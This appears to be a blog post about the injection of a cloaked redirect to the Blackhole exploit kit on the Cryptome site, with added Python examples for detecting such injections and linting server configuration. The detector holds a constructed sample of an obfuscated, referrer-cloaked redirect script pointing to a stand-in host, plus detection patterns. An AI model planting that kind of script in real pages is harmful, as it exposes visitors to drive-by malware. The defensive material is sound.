The affected browsers were unpatched instances of Microsoft Internet Explorer 6, 7 and 8. The script planted on the web site appears to have been installed on February 8 and was removed by Cryptome on February 12. During that window almost 3,000 visitors were probed, although it is not clear how many of them were running a vulnerable version of IE. The rogue script redirected those browsers to a page serving the Blackhole exploit kit, a crimeware toolkit that fingerprints the visiting browser, fires a matching exploit and drops further malware on the machine, which can then be used as a foothold for attacks on other targets.
One interesting aspect of the planted script was a filter that appears to have suppressed the malicious redirect for visitors arriving from networks likely to scan the script and flag it as malware, such as well-protected university sites and Google; a crawler or researcher from those sources would see a clean page while an ordinary visitor was exploited. Though the origin of the malware has not been firmly established, it appears the intrusion began through several out-of-date, vulnerable FrontPage Server Extensions that Cryptome's developers and webmasters used to maintain the site.
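Two checks a site owner can run against saved copies of their own pages to catch an injection of this kind, as an added example (not Cryptome's code and not the researchers'): a baseline hash comparison that flags any file changed since the last known-good snapshot, and a heuristic that flags inline script blocks combining obfuscation, a redirect and referrer- or user-agent-based cloaking. The sample pages, the `bad.example` host and the indicator lists are constructed for the example and are not artefacts from the incident.

```python
"""Added example (not Cryptome's or the researchers' code): heuristics for
spotting an injected, cloaked redirect script like the one described above.
The sample pages below are constructed for the example; the host name and
indicator lists are assumptions, not artefacts from the incident."""
import hashlib
import re

# Constructed sample: a clean page and the same page with an injected block
# that skips visitors whose referrer looks like Google or a university.
CLEAN_PAGE = """<html><head><title>Cryptome</title></head>
<body><p>Documents archive.</p>
<script src="/js/site.js"></script>
</body></html>
"""

INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>var r=document.referrer;if(r.indexOf("google")==-1&&'
    'r.indexOf(".edu")==-1){eval(unescape("%77%69%6e%64%6f%77%2e%6c%6f%63"));'
    'window.location="http://bad.example/land.php";}</script>\n</body>',
)

# Indicators that, in combination, characterise an injected cloaked redirect.
OBFUSCATION = re.compile(r"\b(eval|unescape|String\.fromCharCode)\s*\(")
REDIRECT = re.compile(r"(window\.|document\.)?location(\.href)?\s*=|location\.replace\(")
CLOAKING = re.compile(r"document\.referrer|navigator\.userAgent")
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(width=[\"']?0|height=[\"']?0|display:\s*none|visibility:\s*hidden)",
    re.I,
)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def suspicious_blocks(html):
    """Return (snippet, reasons) for each inline script block showing at least
    two of the three indicators, plus any hidden iframe. Requiring two keeps
    ordinary analytics code (which reads document.referrer) from being flagged."""
    findings = []
    for m in SCRIPT_BLOCK.finditer(html):
        body = m.group(1)
        reasons = []
        if OBFUSCATION.search(body):
            reasons.append("obfuscation")
        if REDIRECT.search(body):
            reasons.append("redirect")
        if CLOAKING.search(body):
            reasons.append("cloaking")
        if len(reasons) >= 2:
            findings.append((body[:60], reasons))
    for m in HIDDEN_IFRAME.finditer(html):
        findings.append((m.group(0)[:60], ["hidden-iframe"]))
    return findings


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def changed_files(baseline, current):
    """baseline: {path: sha256 of known-good content}; current: {path: content}.
    Returns paths whose content no longer matches the baseline, or that are new."""
    return sorted(p for p, body in current.items()
                  if baseline.get(p) != sha256_hex(body))


if __name__ == "__main__":
    baseline = {"index.html": sha256_hex(CLEAN_PAGE)}
    print("changed:", changed_files(baseline, {"index.html": INJECTED_PAGE}))
    for snippet, reasons in suspicious_blocks(INJECTED_PAGE):
        print(reasons, snippet)
```

The hash comparison is the reliable check: it catches any modification, obfuscated or not, provided the baseline was taken from a copy the attacker could not alter. The content heuristic is a fallback for when no baseline exists and will miss scripts that fetch their payload from elsewhere, so treat its output as a lead, not a verdict.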
Anti-malware researchers offered several recommendations for website owners and for the hosting providers that supply them. First, status pages that announce the technical state of the site should expose as little detail about the server and its software as possible, since that detail tells an attacker what to exploit. Second, debugging output should always be turned off in production. Third, code modules and extensions that the production site does not use should be disabled before the site is opened to the public; each one is attack surface, and the FrontPage extensions blamed here are a case in point. On the visitor side, users should keep both their malware scanners and their other software, the browser above all, patched and up to date.
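A small linter for the three server-side recommendations above, as an added example (not from the page or the researchers), run against php.ini and httpd.conf text. The sample configuration fragments are constructed; the directive names are real PHP and Apache httpd directives, but which modules count as unused is an assumption each site must set for itself.

```python
"""Added example (not from the page or the researchers): a linter for the
three server-side recommendations: no leaky status pages, no debug output in
production, no unused modules. Sample config fragments are constructed; the
UNUSED_MODULES set is an assumption for the example."""
import re

# Constructed sample: a development php.ini carried into production.
PHP_INI = """
display_errors = On
expose_php = On
log_errors = Off
"""

# Constructed sample: version banners, status/info modules and a status page.
HTTPD_CONF = """
ServerTokens Full
ServerSignature On
LoadModule status_module modules/mod_status.so
LoadModule info_module modules/mod_info.so
LoadModule rewrite_module modules/mod_rewrite.so
<Location /server-status>
    SetHandler server-status
</Location>
"""

# (directive, regex matching a bad value, recommended value) for php.ini.
# Only explicit settings are checked; an unset directive takes PHP's built-in
# default, which must be reviewed separately.
PHP_RULES = [
    ("display_errors", r"^(on|1|stdout|stderr)$", "Off"),  # errors shown to visitors
    ("expose_php", r"^(on|1)$", "Off"),                     # X-Powered-By header
    ("log_errors", r"^(off|0)$", "On"),                     # keep errors, in the log
]

# Apache directives that advertise the server's version or state.
APACHE_RULES = [
    ("ServerTokens", r"^(?!prod$).*", "Prod"),
    ("ServerSignature", r"^on$", "Off"),
]

# Modules assumed unused by the production site (assumption for the example).
UNUSED_MODULES = {"status_module", "info_module"}


def audit_php_ini(text):
    findings, settings = [], {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()       # drop comments
        if "=" in line:
            key, val = (s.strip() for s in line.split("=", 1))
            settings[key.lower()] = val
    for key, bad, good in PHP_RULES:
        val = settings.get(key.lower(), "")
        if re.match(bad, val, re.I):
            findings.append(f"php.ini: {key} = {val}; set {key} = {good}")
    return findings


def audit_httpd_conf(text):
    findings = []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        if parts[0] == "LoadModule" and len(parts) > 1 and parts[1] in UNUSED_MODULES:
            findings.append(f"httpd.conf: unused module loaded: {parts[1]}; remove the LoadModule line")
        for directive, bad, good in APACHE_RULES:
            if parts[0].lower() == directive.lower() and len(parts) > 1 and re.match(bad, parts[1], re.I):
                findings.append(f"httpd.conf: {directive} {parts[1]}; set {directive} {good}")
    if re.search(r"SetHandler\s+server-status", text):
        findings.append("httpd.conf: /server-status page enabled; restrict it to admin IPs or remove it")
    return findings


if __name__ == "__main__":
    for finding in audit_php_ini(PHP_INI) + audit_httpd_conf(HTTPD_CONF):
        print(finding)
```

On a real host the same checks belong in a deployment gate rather than a one-off script, so a development configuration cannot reach production unnoticed; the module deny-list is the part that needs local judgement, since a module that is dead weight on one site is load-bearing on another.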
But beyond these bits of technical advice, the one aspect of this incident that shines through is the volunteer who felt it was his duty to tell the site owners that something was wrong with their web site. Such warnings should never be ignored.
Kimberly Dovander
Kimberly is the pro blogger in the WHS family. WordPress, Blogger, Tumblr... It doesn't matter - she knows them all. Send her a question, or drop a line in the comment section below, and she'll get back to you.